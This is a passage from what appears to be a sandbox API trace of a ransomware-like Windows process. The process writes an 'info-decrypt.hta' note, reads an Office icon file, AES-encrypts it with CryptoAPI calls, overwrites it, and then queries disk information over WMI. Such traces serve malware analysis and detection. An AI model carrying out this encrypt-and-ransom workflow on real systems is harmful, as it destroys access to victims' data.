lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xad743900, ftCreationTime.dwHighDateTime=0x1c62706, ftLastAccessTime.dwLowDateTime=0x6d3a4910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xad743900, ftLastWriteTime.dwHighDateTime=0x1c62706, nFileSizeHigh=0x0, nFileSizeLow=0x627e, dwReserved0=0x0, dwReserved1=0x0, cFileName="SharePointTeamSite.ico", cAlternateFileName="SHAREP~2.ICO")) returned 1 [0203.217] FindNextFileW (in: hFindFile=0xb7f1d0, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeed38550, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeed38550, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="UICaptions", cAlternateFileName="UICAPT~1")) returned 1 [0203.217] FindNextFileW (in: hFindFile=0xb7f1d0, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0203.218] FindClose (in: hFindFile=0xb7f1d0 | out: hFindFile=0xb7f1d0) returned 1 [0203.218] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3ec) returned 1 [0203.218] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3f8) returned 1 [0203.218] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\AssetLibrary.ico", nBufferLength=0x105, lpBuffer=0x691eea0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\OFFICE\\AssetLibrary.ico", lpFilePart=0x0) returned 0x30 [0203.218] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x691eea8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\OFFICE\\info-decrypt.hta", lpFilePart=0x0) returned 0x30 [0203.219] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f308) returned 1 [0203.219] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\info-decrypt.hta" (normalized: "c:\\programdata\\microsoft\\office\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x691f384 | out: lpFileInformation=0x691f384*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0203.219] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f304) returned 1 [0203.219] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\AssetLibrary.ico", nBufferLength=0x105, lpBuffer=0x691eea0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\OFFICE\\AssetLibrary.ico", lpFilePart=0x0) returned 0x30 [0203.219] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x691ed48, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\OFFICE\\info-decrypt.hta", lpFilePart=0x0) returned 0x30 [0203.220] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f23c) returned 1 [0203.220] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\info-decrypt.hta" (normalized: "c:\\programdata\\microsoft\\office\\info-decrypt.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x32c [0203.220] GetFileType (hFile=0x32c) returned 0x1 [0203.220] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f238) returned 1 [0203.220] GetFileType (hFile=0x32c) returned 0x1 [0203.220] WriteFile (in: hFile=0x32c, lpBuffer=0x36f9738*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x691f300, lpOverlapped=0x0 | out: lpBuffer=0x36f9738*, lpNumberOfBytesWritten=0x691f300*=0x1000, lpOverlapped=0x0) returned 1 [0203.221] WriteFile (in: hFile=0x32c, lpBuffer=0x36f9738*, nNumberOfBytesToWrite=0x55e, lpNumberOfBytesWritten=0x691f2d4, lpOverlapped=0x0 | out: lpBuffer=0x36f9738*, lpNumberOfBytesWritten=0x691f2d4*=0x55e, lpOverlapped=0x0) returned 1 [0203.222] CloseHandle (hObject=0x32c) returned 1 [0203.222] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\AssetLibrary.ico", nBufferLength=0x105, lpBuffer=0x691eea8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\OFFICE\\AssetLibrary.ico", lpFilePart=0x0) returned 0x30 [0203.222] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f354) returned 1 [0203.222] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\AssetLibrary.ico" (normalized: "c:\\programdata\\microsoft\\office\\assetlibrary.ico"), fInfoLevelId=0x0, lpFileInformation=0x36fa754 | out: lpFileInformation=0x36fa754*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5011dd00, ftCreationTime.dwHighDateTime=0x1ca04ff, ftLastAccessTime.dwLowDateTime=0x5f409670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5011dd00, ftLastWriteTime.dwHighDateTime=0x1ca04ff, nFileSizeHigh=0x0, nFileSizeLow=0x1536)) returned 1 [0203.223] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f350) returned 1 [0203.223] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\AssetLibrary.ico", nBufferLength=0x105, lpBuffer=0x691ed94, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\OFFICE\\AssetLibrary.ico", lpFilePart=0x0) returned 0x30 [0203.223] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f288) returned 1 [0203.223] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\AssetLibrary.ico" (normalized: "c:\\programdata\\microsoft\\office\\assetlibrary.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x32c [0203.224] GetFileType (hFile=0x32c) returned 0x1 [0203.224] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f284) returned 1 [0203.224] GetFileType (hFile=0x32c) returned 0x1 [0203.224] GetFileSize (in: hFile=0x32c, lpFileSizeHigh=0x691f390 | out: lpFileSizeHigh=0x691f390*=0x0) returned 0x1536 [0203.224] ReadFile (in: hFile=0x32c, lpBuffer=0x36fa924, nNumberOfBytesToRead=0x1536, lpNumberOfBytesRead=0x691f33c, lpOverlapped=0x0 | out: lpBuffer=0x36fa924*, lpNumberOfBytesRead=0x691f33c*=0x1536, lpOverlapped=0x0) returned 1 [0203.225] CloseHandle (hObject=0x32c) returned 1 [0203.226] CryptAcquireContextW (in: phProv=0x691f2dc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x691f2dc*=0xbdf480) returned 1 [0203.226] CryptGenRandom (in: hProv=0xbdf480, dwLen=0x10, pbBuffer=0x36fc1b0 | out: pbBuffer=0x36fc1b0) returned 1 [0203.998] CryptImportKey (in: hProv=0xbdf480, pbData=0x3879dcc, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x691f2ac | out: phKey=0x691f2ac*=0xb7f950) returned 1 [0203.998] CryptContextAddRef (hProv=0xbdf480, pdwReserved=0x0, dwFlags=0x0) returned 1 [0203.998] CryptContextAddRef (hProv=0xbdf480, pdwReserved=0x0, dwFlags=0x0) returned 1 [0203.998] CryptDuplicateKey (in: hKey=0xb7f950, pdwReserved=0x0, dwFlags=0x0, phKey=0x691f29c | out: phKey=0x691f29c*=0xb7fbd0) returned 1 [0203.999] CryptContextAddRef (hProv=0xbdf480, pdwReserved=0x0, dwFlags=0x0) returned 1 [0203.999] CryptSetKeyParam (hKey=0xb7fbd0, dwParam=0x4, pbData=0x3879eac*=0x1, dwFlags=0x0) returned 1 [0203.999] CryptSetKeyParam (hKey=0xb7fbd0, dwParam=0x1, pbData=0x3879e78, dwFlags=0x0) returned 1 [0203.999] CryptEncrypt (in: hKey=0xb7fbd0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3879ebc*, pdwDataLen=0x691f308*=0x1540, dwBufLen=0x1540 | out: pbData=0x3879ebc*, pdwDataLen=0x691f308*=0x1540) returned 1 [0203.999] CryptEncrypt (in: hKey=0xb7fbd0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x387b420*, pdwDataLen=0x691f310*=0x0, dwBufLen=0x10 | out: pbData=0x387b420*, pdwDataLen=0x691f310*=0x10) returned 1 [0204.001] CryptDestroyKey (hKey=0xb7f950) returned 1 [0204.001] CryptReleaseContext (hProv=0xbdf480, dwFlags=0x0) returned 1 [0204.001] CryptReleaseContext (hProv=0xbdf480, dwFlags=0x0) returned 1 [0204.001] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\AssetLibrary.ico", nBufferLength=0x105, lpBuffer=0x691ed80, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\OFFICE\\AssetLibrary.ico", lpFilePart=0x0) returned 0x30 [0204.001] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f274) returned 1 [0204.001] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\AssetLibrary.ico" (normalized: "c:\\programdata\\microsoft\\office\\assetlibrary.ico"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x208 [0204.002] GetFileType (hFile=0x208) returned 0x1 [0204.002] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f270) returned 1 [0204.002] GetFileType (hFile=0x208) returned 0x1 [0204.002] WriteFile (in: hFile=0x208, lpBuffer=0x387ba24*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x691f304, lpOverlapped=0x0 | out: lpBuffer=0x387ba24*, lpNumberOfBytesWritten=0x691f304*=0x20, lpOverlapped=0x0) returned 1 [0204.268] CloseHandle (hObject=0x208) returned 1 [0204.308] CoTaskMemAlloc (cb=0x20c) returned 0xbed438 [0204.309] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xbed438 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0204.309] CoTaskMemFree (pv=0xbed438) [0204.309] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x691ed68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0204.309] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x691f2b0 | out: ppv=0x691f2b0*=0xb51e34) returned 0x0 [0204.309] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x691f2a8 | out: pAptType=0x691f2a8*=1) returned 0x0 [0204.309] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x691f2ac | out: ppvObject=0x691f2ac*=0x0) returned 0x80004002 [0204.309] IUnknown:Release (This=0xb51e34) returned 0x1 [0204.310] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x691ec18 | out: ppv=0x691ec18*=0x6027200) returned 0x0 [0204.310] WbemDefPath:IUnknown:QueryInterface (in: This=0x6027200, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x691ee30 | out: ppvObject=0x691ee30*=0x0) returned 0x80004002 [0204.310] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6027200, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691ee44 | out: ppvObject=0x691ee44*=0x6031120) returned 0x0 [0204.311] WbemDefPath:IUnknown:Release (This=0x6027200) returned 0x0 [0204.311] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031120, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691ea64 | out: ppvObject=0x691ea64*=0x6031120) returned 0x0 [0204.311] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031120, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x691ea20 | out: ppvObject=0x691ea20*=0x0) returned 0x80004002 [0204.311] WbemDefPath:IUnknown:AddRef (This=0x6031120) returned 0x3 [0204.311] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031120, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x691e37c | out: ppvObject=0x691e37c*=0x0) returned 0x80004002 [0204.311] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031120, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x691e32c | out: ppvObject=0x691e32c*=0x0) returned 0x80004002 [0204.311] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031120, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691e338 | out: ppvObject=0x691e338*=0x66ce488) returned 0x0 [0204.311] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x66ce488, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x691e340 | out: pCid=0x691e340*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0204.311] WbemDefPath:IUnknown:Release (This=0x66ce488) returned 0x3 [0204.311] CoGetContextToken (in: pToken=0x691e398 | out: pToken=0x691e398) returned 0x0 [0204.311] CoGetContextToken (in: pToken=0x691e348 | out: pToken=0x691e348) returned 0x0 [0204.311] CoGetContextToken (in: pToken=0x691e7a0 | out: pToken=0x691e7a0) returned 0x0 [0204.311] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031120, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691e830 | out: ppvObject=0x691e830*=0x0) returned 0x80004002 [0204.311] WbemDefPath:IUnknown:Release (This=0x6031120) returned 0x2 [0204.311] WbemDefPath:IUnknown:Release (This=0x6031120) returned 0x1 [0204.311] CoGetContextToken (in: pToken=0x691f128 | out: pToken=0x691f128) returned 0x0 [0204.311] CoGetContextToken (in: pToken=0x691f088 | out: pToken=0x691f088) returned 0x0 [0204.311] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031120, riid=0x691f158*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x691f154 | out: ppvObject=0x691f154*=0x6031120) returned 0x0 [0204.312] WbemDefPath:IUnknown:AddRef (This=0x6031120) returned 0x3 [0204.312] WbemDefPath:IUnknown:Release (This=0x6031120) returned 0x2 [0204.312] WbemDefPath:IWbemPath:SetText (This=0x6031120, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0204.312] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6031120, puCount=0x691f2dc | out: puCount=0x691f2dc*=0x0) returned 0x0 [0204.312] WbemDefPath:IWbemPath:GetText (in: This=0x6031120, lFlags=2, puBuffLength=0x691f2d8*=0x0, pszText=0x0 | out: puBuffLength=0x691f2d8*=0x20, pszText=0x0) returned 0x0 [0204.312] WbemDefPath:IWbemPath:GetText (in: This=0x6031120, lFlags=2, puBuffLength=0x691f2d8*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x691f2d8*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0204.312] WbemDefPath:IWbemPath:GetInfo (in: This=0x6031120, uRequestedInfo=0x0, puResponse=0x691f2e4 | out: puResponse=0x691f2e4*=0xc19) returned 0x0 [0204.312] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6031120, puCount=0x691f2dc | out: puCount=0x691f2dc*=0x0) returned 0x0 [0204.312] WbemDefPath:IWbemPath:GetInfo (in: This=0x6031120, uRequestedInfo=0x0, puResponse=0x691f2e4 | out: puResponse=0x691f2e4*=0xc19) returned 0x0 [0204.312] WbemDefPath:IWbemPath:GetInfo (in: This=0x6031120, uRequestedInfo=0x0, puResponse=0x691f2e4 | out: puResponse=0x691f2e4*=0xc19) returned 0x0 [0204.312] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6031120, puCount=0x691f25c | out: puCount=0x691f25c*=0x0) returned 0x0 [0204.312] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x691f248 | out: puCount=0x691f248*=0x2) returned 0x0 [0204.312] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x691f244*=0x0, pszText=0x0 | out: puBuffLength=0x691f244*=0xf, pszText=0x0) returned 0x0 [0204.312] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x691f244*=0xf, pszText="00000000000000" | out: puBuffLength=0x691f244*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0204.312] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x691f1f8 | out: ppv=0x691f1f8*=0xb51e34) returned 0x0 [0204.312] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x691f1f0 | out: pAptType=0x691f1f0*=1) returned 0x0 [0204.312] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x691f1f4 | out: ppvObject=0x691f1f4*=0x0) returned 0x80004002 [0204.312] IUnknown:Release (This=0xb51e34) returned 0x1 [0204.313] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x691eb60 | out: ppv=0x691eb60*=0x60271b0) returned 0x0 [0204.313] WbemDefPath:IUnknown:QueryInterface (in: This=0x60271b0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x691ed78 | out: ppvObject=0x691ed78*=0x0) returned 0x80004002 [0204.313] WbemDefPath:IClassFactory:CreateInstance (in: This=0x60271b0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691ed8c | out: ppvObject=0x691ed8c*=0x6030cc0) returned 0x0 [0204.313] WbemDefPath:IUnknown:Release (This=0x60271b0) returned 0x0 [0204.313] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030cc0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691e9ac | out: ppvObject=0x691e9ac*=0x6030cc0) returned 0x0 [0204.313] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030cc0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x691e968 | out: ppvObject=0x691e968*=0x0) returned 0x80004002 [0204.314] WbemDefPath:IUnknown:AddRef (This=0x6030cc0) returned 0x3 [0204.315] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030cc0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x691e2c4 | out: ppvObject=0x691e2c4*=0x0) returned 0x80004002 [0204.315] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030cc0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x691e274 | out: ppvObject=0x691e274*=0x0) returned 0x80004002 [0204.315] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030cc0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691e280 | out: ppvObject=0x691e280*=0x66ce438) returned 0x0 [0204.315] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x66ce438, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x691e288 | out: pCid=0x691e288*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0204.315] WbemDefPath:IUnknown:Release (This=0x66ce438) returned 0x3 [0204.315] CoGetContextToken (in: pToken=0x691e2e0 | out: pToken=0x691e2e0) returned 0x0 [0204.315] CoGetContextToken (in: pToken=0x691e290 | out: pToken=0x691e290) returned 0x0 [0204.315] CoGetContextToken (in: pToken=0x691e6e8 | out: pToken=0x691e6e8) returned 0x0 [0204.315] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030cc0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691e778 | out: ppvObject=0x691e778*=0x0) returned 0x80004002 [0204.315] WbemDefPath:IUnknown:Release (This=0x6030cc0) returned 0x2 [0204.315] WbemDefPath:IUnknown:Release (This=0x6030cc0) returned 0x1 [0204.315] CoGetContextToken (in: pToken=0x691f070 | out: pToken=0x691f070) returned 0x0 [0204.315] CoGetContextToken (in: pToken=0x691efd0 | out: pToken=0x691efd0) returned 0x0 [0204.315] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030cc0, riid=0x691f0a0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x691f09c | out: ppvObject=0x691f09c*=0x6030cc0) returned 0x0 [0204.315] WbemDefPath:IUnknown:AddRef (This=0x6030cc0) returned 0x3 [0204.315] WbemDefPath:IUnknown:Release (This=0x6030cc0) returned 0x2 [0204.315] WbemDefPath:IWbemPath:SetText (This=0x6030cc0, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0204.315] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030cc0, puCount=0x691f220 | out: puCount=0x691f220*=0x2) returned 0x0 [0204.315] WbemDefPath:IWbemPath:GetText (in: This=0x6030cc0, lFlags=4, puBuffLength=0x691f21c*=0x0, pszText=0x0 | out: puBuffLength=0x691f21c*=0xf, pszText=0x0) returned 0x0 [0204.315] WbemDefPath:IWbemPath:GetText (in: This=0x6030cc0, lFlags=4, puBuffLength=0x691f21c*=0xf, pszText="00000000000000" | out: puBuffLength=0x691f21c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0204.316] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x691f220 | out: ppv=0x691f220*=0xb51e34) returned 0x0 [0204.316] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x691f218 | out: pAptType=0x691f218*=1) returned 0x0 [0204.316] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x691f21c | out: ppvObject=0x691f21c*=0x0) returned 0x80004002 [0204.316] IUnknown:Release (This=0xb51e34) returned 0x1 [0204.316] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, 